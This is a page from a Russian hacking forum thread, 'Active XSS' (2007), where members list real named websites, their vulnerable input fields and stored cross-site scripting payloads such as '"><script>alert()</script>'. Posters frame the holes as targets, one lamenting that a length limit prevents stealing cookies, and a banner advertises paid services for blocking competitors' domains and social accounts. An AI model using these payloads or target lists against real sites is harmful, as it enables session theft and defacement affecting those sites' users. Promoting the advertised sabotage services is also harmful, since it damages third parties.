Активные Xss

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Активные Xss

Страница 4 из 54

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

08.04.2007, 13:27

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

С нами: 11217866

Репутация: 3812

Отправить сообщение для +toxa+ с помощью AIM

buka.ru
в камментах к новостям
' любезно заменяются на "

𝕏 Twitter Reddit Telegram Копировать ссылку

__________________

11.04.2007, 13:20

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,315

С нами: 10248806

Репутация: 2371

Downloads.ru

Выбираем любой файл....пишем к нему комментарий...
Все поля уязвимые т.е. мыло, ник и сообщение ...

Код:

"><script>alert("xss")</script>

Пример

Последний раз редактировалось Isis; 11.04.2007 в 13:22..

13.04.2007, 00:24

XTErner

Участник форума

Регистрация: 13.03.2007

Сообщений: 120

С нами: 10085717

Репутация: 590

ukrtelecom.ua
http://lib.kost.dn.ukrtelecom.ua/guestbook.php

13.04.2007, 21:48

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

С нами: 10447337

Репутация: 807

liveinternet.ru

В дневниках.
1) Пишем личное сообщение. Уязвимо поле "Заголовок:"

Код:

"><script>alert();</script>

Если пользователь ответит на это сообщение, то велезет алерт.

2) Добавляем новость в дневник. Уязвимо поле "Добавление новости:"

Код:

"><script>alert();</script>

Последний раз редактировалось freddi; 13.04.2007 в 22:29..

16.04.2007, 00:13

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

С нами: 10160966

Репутация: 1719

2 »Atom1c«

пост №16
http://forum.antichat.ru/showpost.ph...5&postcount=16

18.04.2007, 23:39

[dword]

Участник форума

Регистрация: 11.04.2007

Сообщений: 103

С нами: 10043772

Репутация: 273

zip-2002,

Код:

http://www.zip-2002.ru/forum/new.php?t=1&cat=3

В форме сообщения вводим: <script>alert();</script>

19.04.2007, 00:40

[dword]

Участник форума

Регистрация: 11.04.2007

Сообщений: 103

С нами: 10043772

Репутация: 273

Сайт: http://aktiv.kak-ya.ru/
Путь: http://aktiv.kak-ya.ru/by/ole4ka/2006/04/26/3434/comments
Уязвимое поле: Заголовок

Код:

 
"><script>alert("hek \nActive_jaja")</script>

Сайт: http://forum.allsoch.ru/
Путь: http://forum.allsoch.ru/showthread.php3?s=11&threadid=17076
Уязвимое поле: Ваш ответ.

Код:

 
"><script>alert()</script>

Последний раз редактировалось [dword]; 19.04.2007 в 08:12..

24.04.2007, 21:49

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

С нами: 10226672

Репутация: 441

http://www.bilandima.ru бррр..противно...

Дневники>Новая Запись> Адрес фотографии >

Код:

 http://"><script>alert(/xss/)</script>

да ещё там в куках..пасс в открытом виде)

24.04.2007, 22:15

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

С нами: 10447337

Репутация: 807

rambler.ru

В «Планете» -> «Профиль» -> «Контакты»
Уязвимо поле “ICQ 2” и название аватарки.
Куки не стыришь, тк ограничение стоит 22 символа(((

Код:

<img src=javascript:alert()>

Последний раз редактировалось freddi; 01.05.2007 в 19:52..

#10

25.04.2007, 06:45

Horsekiller

Познающий

Регистрация: 22.11.2006

Сообщений: 68

С нами: 10245582

Репутация: 137

http://kemclub.ru/

При регистрации (http://kemclub.ru/reg.php), уязвимо поле Ф.И.О -

Код:

<script>alert()</script>

,

потом заходим

Код:

http://kemclub.ru/club.php?p=8&srat=1

Находим себя, получаем алерт.

Страница 4 из 54

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
mylivepage.ru активные XSS	__XT__	Уязвимости	3	23.12.2006 14:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules